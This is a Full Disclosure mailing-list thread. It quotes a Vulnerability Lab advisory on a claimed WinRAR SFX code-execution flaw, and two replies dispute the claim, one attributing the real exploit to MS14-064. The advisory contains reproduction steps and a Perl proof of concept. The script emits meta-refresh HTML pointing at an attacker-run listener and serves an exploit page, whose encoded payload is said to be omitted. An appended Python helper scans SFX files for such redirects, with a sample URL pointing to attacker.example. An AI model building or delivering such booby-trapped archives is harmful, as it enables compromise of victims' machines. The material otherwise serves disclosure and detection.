In fact, an SFX file can only try to access a specific URL (the attacker's server). Then the attacker exploits a Microsoft vulnerability (MS14-064).
The WinRAR file doesn't allow RCE by itself.

--
Hernán Möller
http://nivel4.com

2015-09-28 5:39 GMT-03:00 Gynvael Coldwind <[email protected]>:

> Correct me if I'm wrong, but the vulnerability can be summarized as: if you
> run an untrusted .exe you might execute malicious code?
>
> I hardly see this as giving anything new to the attacker who can just
> create a malicious exe file, set the winrar sfx icon and send it to the
> victim.
>
> Keep in mind that not every unexpected behavior or software bug is a
> security vulnerability.
>
> (and no, potential AV bypass doesn't make it a vulnerability either)
>
> Cheers,
> Gynvael
>
> On Mon, 28 Sep 2015 10:27 Vulnerability Lab <[email protected]> wrote:
>
> > Document Title:
> > ===============
> > WinRAR SFX v5.21 - Remote Code Execution Vulnerability
> >
> > References (Source):
> > ====================
> > http://www.vulnerability-lab.com/get_content.php?id=1608
> >
> > Video: https://www.youtube.com/watch?v=fo0l0oT4468
> >
> > Release Date:
> > =============
> > 2015-09-28
> >
> > Vulnerability Laboratory ID (VL-ID):
> > ====================================
> > 1608
> >
> > Common Vulnerability Scoring System:
> > ====================================
> > 9
> >
> > Product & Service Introduction:
> > ===============================
> > WinRAR, with over 500 million users worldwide, is by far the most popular
> > compression program and therefore the best way to pack files securely and
> > efficiently for a data transfer, to speed up the data transfer via
> > e-mail and to store optimized files securely.
> >
> > (Copy of the Homepage: http://www.win-rar.com/start.html )
> >
> > Abstract Advisory Information:
> > ==============================
> > An independent vulnerability laboratory researcher discovered a code
> > execution vulnerability in the official WinRAR SFX v5.21 software.
> >
> > Vulnerability Disclosure Timeline:
> > ==================================
> > 2015-09-28: Public Disclosure (Vulnerability Laboratory)
> >
> > Discovery Status:
> > =================
> > Published
> >
> > Exploitation Technique:
> > =======================
> > Remote
> >
> > Severity Level:
> > ===============
> > Critical
> >
> > Technical Details & Description:
> > ================================
> > A remote code execution vulnerability has been discovered in the official
> > WinRAR SFX v5.21 software.
> > The vulnerability allows remote attackers to execute unauthorized system
> > specific code to compromise a target system.
> >
> > The issue is located in the `Text and Icon` function of the `Text to
> > display in SFX window` module. Remote attackers are
> > able to generate their own compressed archives with malicious payloads to
> > execute system specific code for compromise. The attackers
> > save the maliciously generated HTML code in the SFX archive input. This
> > results in system specific code execution when a target
> > user or system opens the compressed archive.
> >
> > The security risk of the code execution vulnerability is estimated as
> > critical with a CVSS (Common Vulnerability Scoring System) count of 9.2.
> > Exploitation of the code execution vulnerability requires low user
> > interaction (open file) without a privileged system or restricted user
> > account.
> > Successful exploitation of the remote code execution vulnerability in the
> > WinRAR SFX software results in system, network or device compromise.
> >
> > Proof of Concept (PoC):
> > =======================
> > The code execution vulnerability can be exploited by remote attackers
> > without a privileged system user account or user interaction.
> > For security demonstration or to reproduce the vulnerability follow the
> > provided information and steps below to continue.
> >
> > Manual steps to reproduce the vulnerability ...
> > 1. Run the perl code: perl poc.pl
> > 2. Right click on any file and select "Add to archive..."
> > 3. Select "Create SFX archive"
> > 4. Go to the Advanced menu and select "SFX options..."
> > 5. Go to the "Text and icon" menu
> > 6. Copy the perl output (HTML) and paste it into "Text to display in SFX
> > window"
> > 7. Click OK -- OK
> > 8. Your SFX file is created
> > 9. Just open the SFX file
> > 10. Your link is downloaded/executed on your target
> > 11. Successful reproduction of the code execution vulnerability!
> >
> > PoC: Exploit Code
> >
> > #!/usr/bin/perl
> > # Title : WinRAR SFX - Remote Code Execution
> > # Affected Versions: All Versions
> > # Tested on Windows 7 / Server 2008
> > #
> > # Author: Mohammad Reza Espargham
> > # Linkedin: https://ir.linkedin.com/in/rezasp
> > # E-Mail: me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
> > # Website: www.reza.es
> > # Twitter: https://twitter.com/rezesp
> > # FaceBook: https://www.facebook.com/reza.espargham
> > #
> > # ID: MS14-064
> >
> > use strict;
> > use warnings;
> > use IO::Socket;
> > use MIME::Base64 qw( decode_base64 );
> > use Socket 'inet_ntoa';
> > use Sys::Hostname 'hostname';
> >
> > print " Mohammad Reza Espargham\n\n";
> >
> > # Local address the listener is reachable on; this is the URL the
> > # meta refresh in the SFX text window points at.
> > my $ip   = inet_ntoa(scalar gethostbyname(hostname() || 'localhost'));
> > my $port = 80;
> >
> > # HTML to paste into "Text to display in SFX window"
> > my $url = $port == 80 ? "http://$ip" : "http://$ip:$port";
> > print "Winrar HTML Code\n"
> >     . '<html><head><title>poc</title><META http-equiv="refresh" content="0;URL='
> >     . $url . '"></head></html>' . "\n\n";
> >
> > my $server = IO::Socket::INET->new(
> >     Proto     => 'tcp',
> >     LocalPort => $port,
> >     Listen    => SOMAXCONN,
> >     ReuseAddr => 1,
> > ) or die "Unable to create server socket: $!";
> >
> > # Server loop: read the request headers, then answer every request
> > # with the same HTML page
> > while (my $client = $server->accept()) {
> >     my $client_info = '';
> >     while (<$client>) {
> >         last if /^\r\n$/;
> >         $client_info .= $_;
> >     }
> >     incoming($client, $client_info);
> > }
> >
> > sub incoming {
> >     my ($client, $client_info) = @_;
> >     print "\n=== Incoming Request:\n";
> >     print $client buildResponse($client, $client_info);
> >     close($client);
> > }
> >
> > sub buildResponse {
> >     my ($client, $client_info) = @_;
> >
> >     # The original script carries the MS14-064 HTML/VBScript page here
> >     # as a base64 string; that encoded blob is omitted from this copy.
> >     my $poc = '';
> >     $poc = decode_base64($poc);
> >
> >     my $r = "HTTP/1.0 200 OK\r\nContent-type: text/html\r\n\r\n$poc";
> >     return $r;
> > }
> >
> > Security Risk:
> > ==============
> > The security risk of the code execution vulnerability in the WinRAR SFX
> > software is estimated as high. (CVSS 7.4)
> >
> > Credits & Authors:
> > ==================
> > Mohammad Reza Espargham [https://ir.linkedin.com/in/rezasp] ([email protected]
> > or [email protected]) (www.reza.es)
> >
> > Disclaimer & Information:
> > =========================
> > The information provided in this advisory is provided as it is without any
> > warranty. Vulnerability Lab disclaims all warranties, either expressed
> > or implied, including the warranties of merchantability and capability for
> > a particular purpose. Vulnerability-Lab or its suppliers are not liable
> > in any case of damage, including direct, indirect, incidental,
> > consequential loss of business profits or special damages, even if
> > Vulnerability-Lab or its suppliers have been advised of the possibility
> > of such damages. Some states do not allow the exclusion or limitation of
> > liability for consequential or incidental damages so the foregoing
> > limitation may not apply. We do not approve or encourage anybody to break
> > any vendor licenses, policies, deface websites, hack into databases or
> > trade with fraud/stolen material.
> >
> > Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
> > Contact: [email protected] - [email protected] - [email protected]
> > Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
> > Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
> > Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
> > Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
> >
> > Any modified copy or reproduction, including partial usage, of this
> > file requires authorization from Vulnerability Laboratory. Permission to
> > electronically redistribute this alert in its unmodified form is granted.
> > All other rights, including the use of other media, are reserved by
> > Vulnerability-Lab Research Team or its suppliers. All pictures, texts,
> > advisories, source code, videos and other information on this website
> > are trademarks of vulnerability-lab team & the specific authors or managers.
> > To record, list (feed), modify, use or edit our material contact
> > ([email protected] or [email protected]) to get a permission.
> >
> > Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
> >
> > --
> > VULNERABILITY LABORATORY - RESEARCH TEAM
> > SERVICE: www.vulnerability-lab.com
> > CONTACT: [email protected]
> > PGP KEY: http://www.vulnerability-lab.com/keys/[email protected]%280x198E9928%29.txt
> >
> > _______________________________________________
> > Sent through the Full Disclosure mailing list
> > https://nmap.org/mailman/listinfo/fulldisclosure
> > Web Archives & RSS: http://seclists.org/fulldisclosure/
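An added triage example, not code from the advisory, from WinRAR, or from anyone in this thread: a Python helper that scans the raw bytes of a WinRAR SFX executable for HTML that the SFX text window would render, and flags meta-refresh redirects and active content. It assumes the SFX text is stored as 8-bit text inside the file; the sample bytes and the host attacker.example are constructed for the demonstration.

```python
import re

# Added triage helper (assumption: the SFX text is stored as 8-bit text
# somewhere in the executable, so a raw byte scan can find it).
META_RE = re.compile(rb'<meta\b[^>]*>', re.IGNORECASE)
REFRESH_RE = re.compile(rb'http-equiv\s*=\s*["\']?\s*refresh', re.IGNORECASE)
REFRESH_URL_RE = re.compile(
    rb'content\s*=\s*["\']?\s*\d+\s*;\s*url\s*=\s*([^"\'>\s]+)', re.IGNORECASE)
ACTIVE_RE = re.compile(rb'<(script|iframe|object|embed)\b', re.IGNORECASE)
URL_RE = re.compile(rb'https?://[^\s"\'<>]+', re.IGNORECASE)


def scan_sfx_bytes(data: bytes) -> dict:
    """Report meta-refresh targets, active-content tags and URLs in an SFX."""
    if not data.startswith(b"MZ"):
        raise ValueError("not a PE executable, so not a WinRAR SFX")
    refresh_urls = set()
    for tag in META_RE.finditer(data):
        # only <meta> tags that are refresh directives carry a redirect target
        if REFRESH_RE.search(tag.group(0)):
            m = REFRESH_URL_RE.search(tag.group(0))
            if m:
                refresh_urls.add(m.group(1).decode("latin-1"))
    return {
        "refresh_urls": sorted(refresh_urls),
        "active_tags": sorted({m.group(1).lower().decode("latin-1")
                               for m in ACTIVE_RE.finditer(data)}),
        "urls": sorted({m.group(0).decode("latin-1")
                        for m in URL_RE.finditer(data)}),
    }


def is_suspicious(report: dict) -> bool:
    """An SFX dialog has no business redirecting or running script."""
    return bool(report["refresh_urls"] or report["active_tags"])


# Constructed sample: a fake MZ header followed by the kind of text block
# the advisory pastes into "Text to display in SFX window".
SAMPLE = (b"MZ" + b"\x00" * 64
          + b'<html><head><title>poc</title><META http-equiv="refresh" '
          b'content="0;URL=http://attacker.example"></head></html>')

if __name__ == "__main__":
    report = scan_sfx_bytes(SAMPLE)
    print(report, "SUSPICIOUS" if is_suspicious(report) else "clean")
```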
